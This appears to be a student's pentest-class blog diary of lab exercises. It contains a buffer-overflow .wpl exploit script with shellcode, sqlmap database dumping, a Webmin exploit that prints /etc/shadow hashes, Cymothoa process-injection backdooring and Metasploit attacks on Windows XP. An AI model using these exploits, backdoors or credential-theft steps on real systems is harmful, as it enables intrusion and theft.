ok this is may last time try. I try to exploit using *.wpl extension. and here the result.
1. first picture explain that EIP fill by A character

2. picture describe that I was get fiil the EIP by DEADBEEF. I can get this after fill the stack using 43500 character junk

 3. I use shlwapi to fine the JMP ESP command

4. and here  my script

jnk="\x43" * (43500);

#jnk+="\xEF\xBE\xAD\xDE"

jnk+="\x27\xB2\xFA\x77"

#jnk+="\x41"*16

jnk+="\x90"*32

jnk+=("\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"

"\x20\xd3\x4e\x83\xeb\xfc\xe2\xf4\xc3\xc8\x97\x4e\x3f\x20\x58\x0b"

"\x03\xab\xaf\x4b\x47\x21\x3c\xc5\x70\x38\x58\x11\x1f\x21\x38\x07"

"\xb4\x14\x58\x4f\xd1\x11\x13\xd7\x93\xa4\x13\x3a\x38\xe1\x19\x43"

"\x3e\xe2\x38\xba\x04\x74\xf7\x4a\x4a\xc5\x58\x11\x1b\x21\x38\x28"

"\xb4\x2c\x98\xc5\x60\x3c\xd2\xa5\xb4\x3c\x58\x4f\xd4\xa9\x8f\x6a"

"\x3b\xe3\xe2\x8e\x5b\xab\x93\x7e\xba\xe0\xab\x42\xb4\x60\xdf\xc5"

"\x4f\x3c\x7e\xc5\x57\x28\x38\x47\xb4\xa0\x63\x4e\x3f\x20\x58\x26"

"\x03\x7f\xe2\xb8\x5f\x76\x5a\xb6\xbc\xe0\xa8\x1e\x57\x5e\x0b\xac"

"\x4c\x48\x4b\xb0\xb5\x2e\x84\xb1\xd8\x43\xb2\x22\x5c\x0e\xb6\x36"

"\x5a\x20\xd3\x4e")

ex = jnk

file=open("try.wpl","w")

file.write(ex)

file.close()

#alamat JMP ESP ADA DI 77FAB227 jika di balik menjadi "\x27\xB2\xFA\X77".ketemu di shlwapi.dll

warFTP

when I write this I get a influenza. finnaly I must say that I'm fail on it. I was success install the war ftp but I'm file to configure it so it can connect with my backtrack. ok let see my trouble.

first I wanna show that the connection it's all fine   it can see from the ping result

the next I will show about  the warFTP config

from picture above we know that the warftp properly set...

but my problem come when I start to conect using nc

I was try to make the exploit but I was read the book many time but I still not understand and still to many question may be it because i'm really don't know about python. I need help.... and my physic condition it is not to good. sorry I was try hard

how to use sqlmap

what is sqlmap
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
how to use it
first thing that must we do before use this tools is we must make sure that the web are had a vulnerability in SQLi. for example http://192.168.0.21/data/get_int.php?id=1 when we put the single quote after the last address and we see some thing error on it. it mean that we can use the sqlmap.int he class we know that dvwa have an vulnerability in sqli so we just type like bellow

root@bt:/pentest/database/sqlmap# ./sqlmap.py  -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie="security=low; Xplico=6pkfig990001f3sqqmmjcr5im7; PHPSESSID=ao6gfq0ou4bafia7vphn6qfvl0" --dbs

command above will produce the information about the database content on the server.

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 21:53:15

[21:53:15] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[21:53:15] [INFO] testing connection to the target url

[21:53:15] [INFO] heuristics detected web page charset 'ascii'

[21:53:16] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests

[21:53:16] [INFO] testing if the url is stable, wait a few seconds

[21:53:17] [INFO] url is stable

[21:53:17] [INFO] testing if GET parameter 'id' is dynamic

[21:53:17] [INFO] confirming that GET parameter 'id' is dynamic

[21:53:17] [INFO] GET parameter 'id' is dynamic

[21:53:17] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)

[21:53:17] [INFO] testing sql injection on GET parameter 'id'

[21:53:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[21:53:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[21:53:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[21:53:17] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

[21:53:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[21:53:24] [INFO] target url appears to be UNION injectable with 2 columns

[21:53:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable

GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y

[21:53:28] [INFO] testing if GET parameter 'Submit' is dynamic

[21:53:28] [WARNING] GET parameter 'Submit' appears to be not dynamic

[21:53:28] [INFO] heuristic test shows that GET parameter 'Submit' might be injectable (possible DBMS: MySQL)

[21:53:28] [INFO] testing sql injection on GET parameter 'Submit'

[21:53:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[21:53:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[21:53:29] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[21:53:29] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[21:53:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[21:53:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[21:53:30] [WARNING] GET parameter 'Submit' is not injectable

sqlmap identified the following injection points with a total of 149 HTTP(s) requests:

---

Place: GET

Parameter: id

    Type: UNION query

    Title: MySQL UNION query (NULL) - 1 to 10 columns

    Payload: id=' UNION ALL SELECT NULL, CONCAT(CHAR(58,116,101,121,58),CHAR(84,105,69,117,65,89,80,116,111,103),CHAR(58,99,116,99,58))# &Submit=Submit

---

[21:53:30] [INFO] manual usage of GET payloads requires url encoding

[21:53:30] [INFO] testing MySQL

[21:53:30] [INFO] confirming MySQL

[21:53:30] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL >= 5.0.0

[21:53:30] [INFO] fetching database names

available databases [4]:

[*] dvwa

[*] fbip

[*] information_schema

[*] mysql

[21:53:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 21:53:30

 we see that in the end information server available data base. there are 4 database. what about to dump the database. to dump the database we must type command like bellow

 root@bt:/pentest/database/sqlmap# ./sqlmap.py  -u "http://localhost/dvwa/vulnerabilities/sqli/?id='&Submit=Submit" --cookie="security=low; Xplico=6pkfig990001f3sqqmmjcr5im7; PHPSESSID=ao6gfq0ou4bafia7vphn6qfvl0"-D mysql  --dump 

previllage escalation

the based rule that must we use in the way of hacking is

1. Information Gathering
2. Service Enumeration
3. Vulnerability Assessment
4. Exploit

sabtu 04 Febryari 2012 we have duty to do a previllage escalation in the computer 192.168.0.21. the most important is we only have 10 minut time.

first step is information gathering. use nmap to gathering information about what else service that running on the suspect.

root@bt:~# nmap -sV 192.168.0.21

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-04 18:06 WIT

Nmap scan report for 192.168.0.21

Host is up (0.0016s latency).

Not shown: 995 closed ports

PORT      STATE SERVICE     VERSION

22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)

80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)

139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)

445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)

10000/tcp open  http        MiniServ 0.01 (Webmin httpd)

MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)

Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 24.51 seconds

 from teks above we know something different in the port 1000 with a clue web min httpd. from that information we directly use the meta exploit to looking some tools that may be we can use.

msf > search webmin

Matching Modules

================

   Name                                    Disclosure Date  Rank    Description

   ----                                    ---------------  ----    -----------

   auxiliary/admin/webmin/file_disclosure  2006-06-30       normal  Webmin file disclosure

msf > use auxiliary/admin/webmin/file_disclosure 

msf  auxiliary(file_disclosure) > set rhost 192.168.0.21

rhost => 192.168.0.21

msf  auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/passwd...

[*] The server returned: 200 Document follows

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:x:13:13:proxy:/bin:/bin/sh

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/bin/sh

list:x:38:38:Mailing List Manager:/var/list:/bin/sh

irc:x:39:39:ircd:/var/run/ircd:/bin/sh

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

dhcp:x:100:101::/nonexistent:/bin/false

syslog:x:101:102::/home/syslog:/bin/false

klog:x:102:103::/home/klog:/bin/false

mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false

sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin

vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash

obama:x:1001:1001::/home/obama:/bin/bash

osama:x:1002:1002::/home/osama:/bin/bash

yomama:x:1003:1003::/home/yomama:/bin/bash

[*] Auxiliary module execution completed

msf  auxiliary(file_disclosure) > ls

[*] exec: ls

0bf3a6a5724cf0b0499ca7e73ac252ae.rtf

404606_2784683289646_1035152752_32311634_134946266_n.jpg

builder32-2

c16547b957eb2413ec509c66343cd7cb.rtf

Desktop

ed3691697b313fbb1bdf495b7fb1c9a3.rtf

meterpreter.pdf

VirtualBox VMs

upst.... something wrong why the password does not appear?? ok let see the option by typing show options

msf  auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

   Name     Current Setting   Required  Description

   ----     ---------------   --------  -----------

   DIR      /unauthenticated  yes       Webmin directory path

   Proxies                    no        Use a proxy chain

   RHOST    192.168.0.21      yes       The target address

   RPATH    /etc/passwd       yes       The file to download

   RPORT    10000             yes       The target port

   VHOST                      no        HTTP server virtual host

msf  auxiliary(file_disclosure) > set rpath /etc/shadow/

rpath => /etc/shadow/

msf  auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/shadow/...

[*] The server returned: 200 Document follows

root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::

daemon:*:14040:0:99999:7:::

bin:*:14040:0:99999:7:::

sys:*:14040:0:99999:7:::

sync:*:14040:0:99999:7:::

games:*:14040:0:99999:7:::

man:*:14040:0:99999:7:::

lp:*:14040:0:99999:7:::

mail:*:14040:0:99999:7:::

news:*:14040:0:99999:7:::

uucp:*:14040:0:99999:7:::

proxy:*:14040:0:99999:7:::

www-data:*:14040:0:99999:7:::

backup:*:14040:0:99999:7:::

list:*:14040:0:99999:7:::

irc:*:14040:0:99999:7:::

gnats:*:14040:0:99999:7:::

nobody:*:14040:0:99999:7:::

dhcp:!:14040:0:99999:7:::

syslog:!:14040:0:99999:7:::

klog:!:14040:0:99999:7:::

mysql:!:14040:0:99999:7:::

sshd:!:14040:0:99999:7:::

vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::

obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::

osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::

yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

[*] Auxiliary module execution completed

msf  auxiliary(file_disclosure) > ls

[*] exec: ls

0bf3a6a5724cf0b0499ca7e73ac252ae.rtf

404606_2784683289646_1035152752_32311634_134946266_n.jpg

builder32-2

c16547b957eb2413ec509c66343cd7cb.rtf

Desktop

ed3691697b313fbb1bdf495b7fb1c9a3.rtf

meterpreter.pdf

VirtualBox VMs

binggo we get the list off password and the user name obama root  etc ... that all done

 

how to use cymothoa

in the post before it I was explain about cymothoa so it time to write about it. actually when we type cymothoa there will be allot of help how to use it.first type

>cymothoa -S

script above to show the list of injection that we can use.

to inject the proses we need the process ID or PID to get the PID just type

>ps -ax

that command will produce the list of process that running  on the system

after we know the PID we can begin the injection by typing

 >cymothoa -p 1140 -s 0 -y 9000

command above have meaning that we use the shell number 0 and inject the process with PID 1140 in port 9000

 we see that infection done. when we check the process so will be two kind off process with the same name.
inthe to make sure that our injection is done we can scan using nmap

see that port 9000 is open. with service name listener.

how to backdooring using nc

the next duty about NC (net cat) not (net cut)...first what is nc....
Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.
actually this is use full tool that can listening to the some port etc. 
by default is included in the linux OS but when we practice in the class we found that nc does not exist on the system. so what the solution?? the solutions is copy the binary of nc.traditional from the bt5 and then put the file binary in the /bin/ directory.
after nc properly copied into the ubuntu system we can try to execute nc with a command 

root@ubuntu-VirtualBox:/bin# ./nc.traditional -l -p 9000

the meaning of the command above is to execute nc and listening into port 9000. in our host use nc with a command

nc 192.168.43.129 9000

to identify that our connection is done. we can type anything in the console. and all anything that we have type will show up in the other side. more clear we can see an illustration picture bellow :

from picture above we can see that anything we type will show in other host(guest host). picture above is describe that we conecting using nc. if we were connect the next step is send the cymothoa to the guest. how to do that. but before   we do that may be we confuse about what is cymothoa is???

Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them.

back again tothe main point or the next step to send cymothoa to the ubuntu system we can use command lke bellow :

nc 192.168.43.129 9000 < cymothoa

 important note before we execute command above we must make sure that we were be in the cymothoa file directory /pentest/backdoors/cymotho/   in the client side(UBUNTU we must type

>cymothoa

if it is done well so in the path that we get well created file named cymothoa. just gift permission to 777 and then to test that the file are work type command bellow

./cymothoa

 if all anything doing fine so will look like picture bellow

Exploit The XP SP3

from the other duty that I get, I think this is the most difficult. Exploit the win xp sp3. I don't have any idea how I must start. When in the class the assistant does not explain what must to do. he only say use the nessus to gather information and catch something vulnerable. And then use the exploitdb.

Ok to the point aja... to start the nessus as we know that nessus walk on 8834 port so just type in the address bar https://localhost:8834 wait for a while and login using the username and password that we was enter before.

Ok after we enter the right username and password we will enter the nessus page like picture bellow.

On the picture above choose scan so we will make a new project scaner and just enter the add button

enter the name of our project type etc just like picture bellow and click launch scan

after we press Launch scan, the scan will began and wait until the process done.

 Se that the scan get six high result that we can exploit. On it. To see the detail just double click on it. And if we wanna see the detail just click and nessus will tells us the detail

if we click so will show detail like picture bellow

using nessuss done. It's time to use the meta exploit or exploit db honestly until now to many question about how to use the exploit?? how.. how.. and how....?? I try to ask google some help but I did not get the right answer.

Omg Alhamdulilahirobilalamin.. puji tuhan thanks god masyaallah at least I understand how to use it... emh.... now 21.11 at 02 februari 2012.. I know.. I know.. I know...

after round-round (puter-puter) and searching searching at least I understand. Ok do not to many talk we directly go to the case. We found MS09-001 just search in the meta exploit.

eh... before do that first we must enter to the meta exploit first by typing msfconsole

and we will enter to the meta-exploit console and then type search ms09-001 remember that ms09-001 is the clue that we get from the nessus scan. Ok not to many talk just see our detail picture bellow

based picture above we know that there some exploit found. Nah... this is the big question that I have finally break. How to use this exploit?????? it's simply just type

use auxiliary/dos/windows/smb/ms09_001_write

 the next step is set the rhost by typing rhost 192.168.43.128. remember that our target is 192.168.43.128 and pres enter. The next step is type exploit.

Binggo and what the result?? the result is the win_xp sp3 in virtual box restart. I dificult to proof it in the blog but this picture bellow can Represented it.

I wanna try another bug. We found six bug right :D :D :D the next bug is MS08_067

oh my god I found some think new on it.. I found meterpreter and I don't know what must to do with it.

Whoooooooooohohohohohohoho.... What I have found??

I try to use ls command and I get all directory in the windows. Nice it is very nice..... Thank to god...

that is all my experience to night... this is not the end bu this is the beginning. it is my first experience and will be my best experience. I'l never forget how happy I'm... I always say Alhamdulilahiroibbil alamin... puji kepada tuhanku Allah SWT tuhan sekalian alam...